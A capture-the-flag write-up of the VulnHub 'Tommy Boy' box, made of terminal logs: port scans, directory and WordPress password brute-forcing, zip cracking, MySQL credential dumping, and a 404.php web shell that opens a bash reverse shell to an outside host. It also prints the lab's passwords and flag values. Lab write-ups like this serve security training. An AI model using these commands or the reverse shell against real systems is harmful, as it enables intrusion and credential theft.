This box followed through with an entire Tommy Boy themed story line. It started through the web server, finding a wordpress site, gaining credentials, and getting SSH. From there we had to gain credentials from the mysql server, go back to the wordpress site, create a web shell, and gain a shell as www-data in order to gain read access to important files. From there the box was pwned.
# Nmap 7.91 scan initiated Mon Sep 27 16:01:40 2021 as: nmap -p- -oN ping_tcp 10.0.0.22 Nmap scan report for 10.0.0.22 Host is up (0.0017s latency). Not shown: 65531 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 8008/tcp open http 65534/tcp open unknown MAC Address: 00:0C:29:6E:ED:CF (VMware) # Nmap done at Mon Sep 27 16:01:48 2021 -- 1 IP address (1 host up) scanned in 8.10 seconds
# Nmap 7.91 scan initiated Mon Sep 27 16:02:01 2021 as: nmap -p22,80,8008,65534 -sV -sC -oN script_tcp 10.0.0.22 Nmap scan report for 10.0.0.22 Host is up (0.00030s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA) | 256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA) |_ 256 56:9e:71:2a:a3:83:ff:63:11:7e:94:08:dd:28:1d:46 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 4 disallowed entries | /6packsofb...soda /lukeiamyourfather |_/lookalivelowbridge /flag-numero-uno.txt |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Welcome to Callahan Auto 8008/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: KEEP OUT 65534/tcp open ftp ProFTPD 1.2.10 MAC Address: 00:0C:29:6E:ED:CF (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Sep 27 16:02:36 2021 -- 1 IP address (1 host up) scanned in 35.70 seconds
<!--Comment from Nick: backup copy is in Big Tom's home folder--> <!--Comment from Richard: can you give me access too? Big Tom's the only one w/password--> <!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time--> <!--Comment from Richard: please, I'll ask nicely--> <!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog--> <!--Comment from Richard: Deal. Where's the blog again?--> <!--Comment from Nick: Seriously? You losers are hopeless. We hid it in a folder named after the place you noticed after you and Tom Jr. had your big fight. You know, where you cracked him over the head with a board. It's here if you don't remember: https://www.youtube.com/watch?v=VUxOd4CszJ8--> <!--Comment from Richard: Ah! How could I forget? Thanks-->
┌──(kali㉿kali)-[~/Documents/VulnHub/TommyBoy_1/nmap] └─$ wget http://10.0.0.22/richard/shockedrichard.jpg --2021-09-27 18:38:09-- http://10.0.0.22/richard/shockedrichard.jpg Connecting to 10.0.0.22:80... connected. HTTP request sent, awaiting response... 200 OK Length: 167037 (163K) [image/jpeg] Saving to: ‘shockedrichard.jpg’ shockedrichard.jpg 100%[=============================================================================>] 163.12K --.-KB/s in 0.001s 2021-09-27 18:38:09 (273 MB/s) - ‘shockedrichard.jpg’ saved [167037/167037] ┌──(kali㉿kali)-[~/Documents/VulnHub/TommyBoy_1/nmap] └─$ exiftool shockedrichard.jpg ExifTool Version Number : 12.30 File Name : shockedrichard.jpg Directory : . File Size : 163 KiB File Modification Date/Time : 2016:07:07 15:17:24-04:00 File Access Date/Time : 2021:09:27 18:38:09-04:00 File Inode Change Date/Time : 2021:09:27 18:38:09-04:00 File Permissions : -rw-r--r-- File Type : JPEG File Type Extension : jpg MIME Type : image/jpeg JFIF Version : 1.01 Resolution Unit : None X Resolution : 1 Y Resolution : 1 Exif Byte Order : Little-endian (Intel, II) Software : Google Copyright : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz. Exif Version : 0220 User Comment : ce154b5a8e59c89732bc25d6a2e6b90b Exif Image Width : 1600 Exif Image Height : 1029 XMP Toolkit : Image::ExifTool 9.97 Rights : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz. Creator Tool : Google Profile CMM Type : Linotronic Profile Version : 2.1.0 Profile Class : Display Device Profile Color Space Data : RGB Profile Connection Space : XYZ Profile Date Time : 1998:02:09 06:49:00 Profile File Signature : acsp Primary Platform : Microsoft Corporation CMM Flags : Not Embedded, Independent Device Manufacturer : Hewlett-Packard Device Model : sRGB Device Attributes : Reflective, Glossy, Positive, Color Rendering Intent : Media-Relative Colorimetric Connection Space Illuminant : 0.9642 1 0.82491 Profile Creator : Hewlett-Packard Profile ID : 0 Profile Copyright : Copyright (c) 1998 Hewlett-Packard Company Profile Description : sRGB IEC61966-2.1 Media White Point : 0.95045 1 1.08905 Media Black Point : 0 0 0 Red Matrix Column : 0.43607 0.22249 0.01392 Green Matrix Column : 0.38515 0.71687 0.09708 Blue Matrix Column : 0.14307 0.06061 0.7141 Device Mfg Desc : IEC http://www.iec.ch Device Model Desc : IEC 61966-2.1 Default RGB colour space - sRGB Viewing Cond Desc : Reference Viewing Condition in IEC61966-2.1 Viewing Cond Illuminant : 19.6445 20.3718 16.8089 Viewing Cond Surround : 3.92889 4.07439 3.36179 Viewing Cond Illuminant Type : D50 Luminance : 76.03647 80 87.12462 Measurement Observer : CIE 1931 Measurement Backing : 0 0 0 Measurement Geometry : Unknown Measurement Flare : 0.999% Measurement Illuminant : D65 Technology : Cathode Ray Tube Display Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract) Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract) Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract) Current IPTC Digest : adfc7551120fa16884c295b6d397931f Envelope Record Version : 4 Coded Character Set : UTF8 Application Record Version : 4 Copyright Notice : Copyright © 1995 Paramount Pictures Corporation. Credit: © 1995 Paramount Pictures / Courtesy: Pyxurz. IPTC Digest : adfc7551120fa16884c295b6d397931f Image Width : 1600 Image Height : 1029 Encoding Process : Baseline DCT, Huffman coding Bits Per Sample : 8 Color Components : 3 Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2) Image Size : 1600x1029 Megapixels : 1.6
Nick's sup3r s3cr3t dr0pb0x - only me and Steve Jobs can see this content Lol
Well, you passed the dummy test But Nick's secret door isn't that easy to open. Gotta know the EXACT name of the .html to break into this fortress. Good luck brainiac. Lol -Nick
┌──(kali㉿kali)-[~/Documents/VulnHub/TommyBoy_1/WebEnum] └─$ gobuster dir -u http://10.0.0.22:8008/NickIzL33t/ -w /usr/share/wordlists/rockyou.txt -x html -a "User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3" | tee nickisl33t =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.0.0.22:8008/NickIzL33t/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/rockyou.txt [+] Negative Status codes: 404 [+] User Agent: User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B176 Safari/7534.48.3 [+] Extensions: html [+] Timeout: 10s =============================================================== 2021/09/27 20:28:00 Starting gobuster in directory enumeration mode =============================================================== Progress: 6644 / 28688786 (0.02%)[ERROR] 2021/09/27 20:28:01 [!] parse "http://10.0.0.22:8008/NickIzL33t/!@#$%^": invalid URL escape "%^" Progress: 40776 / 28688786 (0.14%)[ERROR] 2021/09/27 20:28:03 [!] parse "http://10.0.0.22:8008/NickIzL33t/!\"£$%^": invalid URL escape "%^" Progress: 47376 / 28688786 (0.17%)[ERROR] 2021/09/27 20:28:04 [!] parse "http://10.0.0.22:8008/NickIzL33t/!@#$%^&*()": invalid URL escape "%^&" /??????.html (Status: 200) [Size: 270] /?????? (Status: 200) [Size: 270] Progress: 67280 / 28688786 (0.23%) [ERROR] 2021/09/27 20:28:06 [!] parse "http://10.0.0.22:8008/NickIzL33t/100%sexy": invalid URL escape "%se" [ERROR] 2021/09/27 20:28:06 [!] parse "http://10.0.0.22:8008/NickIzL33t/100%angel": invalid URL escape "%an" Progress: 73806 / 28688786 (0.26%) [ERROR] 2021/09/27 20:28:06 [!] parse "http://10.0.0.22:8008/NickIzL33t/!@#$%^&*": invalid URL escape "%^&" Progress: 80402 / 28688786 (0.28%) [ERROR] 2021/09/27 20:28:06 [!] parse "http://10.0.0.22:8008/NickIzL33t/100%bitch": invalid URL escape "%bi" /////// (Status: 200) [Size: 270] ///////.html (Status: 403) [Size: 94] Progress: 106792 / 28688786 (0.37%) [ERROR] 2021/09/27 20:28:08 [!] parse "http://10.0.0.22:8008/NickIzL33t/!@#$%^&*(": invalid URL escape "%^&" Progress: 119898 / 28688786 (0.42%) [ERROR] 2021/09/27 20:28:09 [!] parse "http://10.0.0.22:8008/NickIzL33t/100%me": invalid URL escape "%me" Progress: 133056 / 28688786 (0.46%) [ERROR] 2021/09/27 20:28:11 [!] parse "http://10.0.0.22:8008/NickIzL33t/100%cute": invalid URL escape "%cu" Progress: 139692 / 28688786 (0.49%) [ERROR] 2021/09/27 20:28:11 [!] parse "http://10.0.0.22:8008/NickIzL33t/!@#$%^&": invalid URL escape "%^&" [ERROR] 2021/09/27 20:28:11 [!] parse "http://10.0.0.22:8008/NickIzL33t/!@#$%": invalid URL escape "%" Progress: 152810 / 28688786 (0.53%) [ERROR] 2021/09/27 20:28:12 [!] parse "http://10.0.0.22:8008/NickIzL33t/100%love": invalid URL escape "%lo" [ERROR] 2021/09/27 20:28:12 [!] parse "http://10.0.0.22:8008/NickIzL33t/!\"£$%^&*()": invalid URL escape "%^&" Progress: 172212 / 28688786 (0.60%) [ERROR] 2021/09/27 20:28:13 [!] parse "http://10.0.0.22:8008/NickIzL33t/100%cool": invalid URL escape "%co" /fallon1.html (Status: 200) [Size: 459] Progress: 205096 / 28688786 (0.71%) [ERROR] 2021/09/27 20:28:16 [!] parse "http://10.0.0.22:8008/NickIzL33t/100%real": invalid URL escape "%re"
┌──(kali㉿kali)-[~/Documents/VulnHub/TommyBoy_1] └─$ crunch 13 13 -t bev,%%@@^1995 -o pass.lst 130 ⨯
┌──(kali㉿kali)-[~/Documents/VulnHub/TommyBoy_1/exfiltrated] └─$ zip2john t0msp4ssw0rdz.zip > pass_hash ver 2.0 efh 5455 efh 7875 t0msp4ssw0rdz.zip/passwords.txt PKZIP Encr: 2b chk, TS_chk, cmplen=332, decmplen=641, crc=DF15B771
┌──(kali㉿kali)-[~/Documents/VulnHub/TommyBoy_1] └─$ john --wordlist=pass.lst pass_hash Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status bevH00tr$1995 (t0msp4ssw0rdz.zip/passwords.txt) 1g 0:00:00:01 DONE (2021-09-28 09:51) 0.7751g/s 12122Kp/s 12122Kc/s 12122KC/s bevH00re{1995..bevH01as'1995 Use the "--show" option to display all of the cracked passwords reliably Session completed
┌──(kali㉿kali)-[~/Documents/VulnHub/TommyBoy_1/exfiltrated] └─$ cat passwords.txt Sandusky Banking Site ------------------------ Username: BigTommyC Password: money TheKnot.com (wedding site) --------------------------- Username: TomC Password: wedding Callahan Auto Server ---------------------------- Username: bigtommysenior Password: fatguyinalittlecoat Note: after the "fatguyinalittlecoat" part there are some numbers, but I don't remember what they are. However, I wrote myself a draft on the company blog with that information. Callahan Company Blog ---------------------------- Username: bigtom(I think?) Password: ??? Note: Whenever I ask Nick what the password is, he starts singing that famous Queen song.
┌──(kali㉿kali)-[~/Documents/VulnHub/TommyBoy_1] └─$ wpscan --url http://10.0.0.22/prehistoricforest/ -P /usr/share/wordlists/rockyou.txt _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.18 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ (Lines Removed) [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00 [i] User(s) Identified: [+] tommy | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] richard | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Rss Generator (Passive Detection) | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] tom | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] Tom Jr. | Found By: Rss Generator (Passive Detection) [+] Big Tom | Found By: Rss Generator (Passive Detection) [+] michelle | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] Performing password attack on Wp Login against 6 user/s ^Cying Tom Jr. / kiss Time: 00:09:58 < > (92405 / 86066352) 0.10% ETA: ??:??:?? [i] No Valid Passwords Found. [!] No WPScan API Token given, as a result vulnerability data has not been output. / 86066352) 0.10% ETA: ??:??:?? [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Tue Sep 28 10:49:48 2021 [+] Requests Done: 92577 [+] Cached Requests: 39 [+] Data Sent: 49.071 MB [+] Data Received: 339.861 MB [+] Memory used: 303.793 MB [+] Elapsed time: 00:10:03 Scan Aborted: Canceled by User
┌──(kali㉿kali)-[~/Documents/VulnHub/TommyBoy_1] └─$ wpscan --url http://10.0.0.22/prehistoricforest/ -P /usr/share/wordlists/rockyou.txt -U ./users.lst 2 ⨯ _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.18 Sponsored by Automattic - https://automattic.com/ @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ (Lines Removed) [+] Performing password attack on Wp Login against 2 user/s [SUCCESS] - tom / tomtom1 ^Cying big tom / 210491 Time: 00:05:28 < > (53196 / 28713447) 0.18% ETA: 49:12:52 [!] Valid Combinations Found: | Username: tom, Password: tomtom1
┌──(kali㉿kali)-[~/Documents/VulnHub/TommyBoy_1] └─$ ssh bigtommysenior@10.0.0.22 130 ⨯ bigtommysenior@10.0.0.22's password: Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-31-generic x86_64) * Documentation: https://help.ubuntu.com/ 143 packages can be updated. 0 updates are security updates. Last login: Thu Jul 14 13:45:57 2016 bigtommysenior@CallahanAutoSrv01:~$
define('DB_NAME', 'wordpress'); define('DB_USER', 'wordpressuser'); define('DB_PASSWORD', 'CaptainLimpWrist!!!'); define('DB_HOST', 'localhost'); define('DB_CHARSET', 'utf8'); define('DB_COLLATE', '');
bigtommysenior@CallahanAutoSrv01:/var/www/html$ mysql -u wordpressuser -pCaptainLimpWrist\!\!\! mysql: [Warning] Using a password on the command line interface can be insecure. Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 323899 Server version: 5.7.13-0ubuntu0.16.04.2 (Ubuntu) Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved. Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql>
mysql> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | wordpress | +--------------------+ 2 rows in set (0.00 sec) mysql> use wordpress Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; +-----------------------+ | Tables_in_wordpress | +-----------------------+ | wp_commentmeta | | wp_comments | | wp_links | | wp_options | | wp_postmeta | | wp_posts | | wp_term_relationships | | wp_term_taxonomy | | wp_termmeta | | wp_terms | | wp_usermeta | | wp_users | +-----------------------+ 12 rows in set (0.00 sec) mysql> select * from wp_users; +----+------------+------------------------------------+---------------+--------------------------+---------------------------------------------+---------------------+---------------------+-------------+-------------------+ | ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | +----+------------+------------------------------------+---------------+--------------------------+---------------------------------------------+---------------------+---------------------+-------------+-------------------+ | 1 | richard | $P$B4j12Ej1AtVPkWprh2R/Dc/6D1poMJ. | richard | richard@callahanauto.tb | | 2016-07-06 20:49:04 | | 0 | richard | | 2 | tom | $P$BmXAz/a8CaPZDNTraFb/g6kZeTpijK. | tom | tom@callahanauto.tb | https://en.wikipedia.org/wiki/Brian_Dennehy | 2016-07-06 20:51:09 | | 0 | Big Tom | | 3 | tommy | $P$BCcKbJIQtLuiBOybaQPkkfe1yYJRkn. | tommy | littletom@callahan.tb | http://www.imdb.com/title/tt3910602/ | 2016-07-06 21:17:30 | | 0 | Tom Jr. | | 4 | michelle | $P$BIEfXY1Li5aYTokSsi7pBgh0FTlO6k/ | michelle | michelle@callahanauto.tb | | 2016-07-06 22:13:17 | | 0 | Michelle Michelle | +----+------------+------------------------------------+---------------+--------------------------+---------------------------------------------+---------------------+---------------------+-------------+-------------------+ 4 rows in set (0.00 sec)
mysql> UPDATE `wp_users` SET `user_pass` = '$P$B4j12Ej1AtVPkWprh2R/Dc/6D1poMJ.' WHERE user_login = 'richard'; Query OK, 1 row affected (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 0 mysql> select * from wp_users; +----+------------+------------------------------------+---------------+--------------------------+---------------------------------------------+---------------------+---------------------+-------------+-------------------+ | ID | user_login | user_pass | user_nicename | user_email | user_url | user_registered | user_activation_key | user_status | display_name | +----+------------+------------------------------------+---------------+--------------------------+---------------------------------------------+---------------------+---------------------+-------------+-------------------+ | 1 | richard | $P$B4j12Ej1AtVPkWprh2R/Dc/6D1poMJ. | richard | richard@callahanauto.tb | | 2016-07-06 20:49:04 | | 0 | richard | | 2 | tom | $P$BmXAz/a8CaPZDNTraFb/g6kZeTpijK. | tom | tom@callahanauto.tb | https://en.wikipedia.org/wiki/Brian_Dennehy | 2016-07-06 20:51:09 | | 0 | Big Tom | | 3 | tommy | $P$BCcKbJIQtLuiBOybaQPkkfe1yYJRkn. | tommy | littletom@callahan.tb | http://www.imdb.com/title/tt3910602/ | 2016-07-06 21:17:30 | | 0 | Tom Jr. | | 4 | michelle | $P$BIEfXY1Li5aYTokSsi7pBgh0FTlO6k/ | michelle | michelle@callahanauto.tb | | 2016-07-06 22:13:17 | | 0 | Michelle Michelle | +----+------------+------------------------------------+---------------+--------------------------+---------------------------------------------+---------------------+---------------------+-------------+-------------------+ 4 rows in set (0.00 sec) mysql> exit
bigtommysenior@CallahanAutoSrv01:/var/www/html/prehistoricforest$ cat ./wp-content/themes/twentyfourteen/404.php <?php /** * The template for displaying 404 pages (Not Found) * * @package WordPress * @subpackage Twenty_Fourteen * @since Twenty Fourteen 1.0 */ get_header(); ?> <div id="primary" class="content-area"> <div id="content" class="site-content" role="main"> <header class="page-header"> <h1 class="page-title"><?php _e( 'Not Found', 'twentyfourteen' ); ?></h1> </header> <div class="page-content"> <p><?php _e( 'It looks like nothing was found at this location. Maybe try a search?', 'twentyfourteen' ); ?></p> <?php get_search_form(); ?> </div><!-- .page-content --> </div><!-- #content --> </div><!-- #primary --> <?php get_sidebar( 'content' ); get_sidebar(); get_footer(); bigtommysenior@CallahanAutoSrv01:/var/www/html/prehistoricforest$ cat ./wp-content/themes/twentysixteen/404.php <?php system("bash -c 'bash -i >& /dev/tcp/10.0.0.1/80 0>&1'"); ?> bigtommysenior@CallahanAutoSrv01:/var/www/html/prehistoricforest$
www-data@CallahanAutoSrv01:/$ cat .5 cat .5.txt FIFTH FLAG!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! YOU DID IT!!!!!!!!!!!!!!!!!!!!!!!!!!!! OH RICHARD DON'T RUN AWAY FROM YOUR FEELINGS!!!!!!!! Flag data: Buttcrack Ok, so NOW what you do is take the flag data from each flag and blob it into one big chunk. So for example, if flag 1 data was "hi" and flag 2 data was "there" and flag 3 data was "you" you would create this blob: hithereyou Do this for ALL the flags sequentially, and this password will open the loot.zip in Big Tom's folder and you can call the box PWNED.
bigtommysenior@CallahanAutoSrv01:/$ find / 2>/dev/null | grep .txt | grep flag /var/thatsg0nnaleaveamark/NickIzL33t/flagtres.txt /var/www/html/flag-numero-uno.txt /var/www/html/prehistoricforest/thisisthesecondflagyayyou.txt /home/bigtommysenior/el-flag-numero-quatro.txt bigtommysenior@CallahanAutoSrv01:/$ cat /var/thatsg0nnaleaveamark/NickIzL33t/flagtres.txt THREE OF 5 FLAGS - you're awesome sauce. Flag data: TinyHead bigtommysenior@CallahanAutoSrv01:/$ cat /var/www/html/flag-numero-uno.txt This is the first of five flags in the Callhan Auto server. You'll need them all to unlock the final treasure and fully consider the VM pwned! Flag data: B34rcl4ws bigtommysenior@CallahanAutoSrv01:/$ cat /var/www/html/prehistoricforest/thisisthesecondflagyayyou.txt You've got 2 of five flags - keep it up! Flag data: Z4l1nsky bigtommysenior@CallahanAutoSrv01:/$ cat /home/bigtommysenior/el-flag-numero-quatro.txt YAY! Flag 4 out of 5!!!! And you should now be able to restore the Callhan Web server to normal working status. Flag data: EditButton But...but...where's flag 5? I'll make it easy on you. It's in the root of this server at /5.txt
bigtommysenior@CallahanAutoSrv01:~$ unzip LOOT.ZIP Archive: LOOT.ZIP [LOOT.ZIP] THE-END.txt password: inflating: THE-END.txt bigtommysenior@CallahanAutoSrv01:~$ cat THE-END.txt YOU CAME. YOU SAW. YOU PWNED. Thanks to you, Tommy and the crew at Callahan Auto will make 5.3 cajillion dollars this year. GREAT WORK! I'd love to know that you finished this VM, and/or get your suggestions on how to make the next one better. Please shoot me a note at 7ms @ 7ms.us with subject line "Here comes the meat wagon!" Or, get in touch with me other ways: * Twitter: @7MinSec * IRC (Freenode): #vulnhub (username is braimee) Lastly, please don't forget to check out www.7ms.us and subscribe to the podcast at bit.ly/7minsec </shamelessplugs> Thanks and have a blessed week! -Brian Johnson 7 Minute Security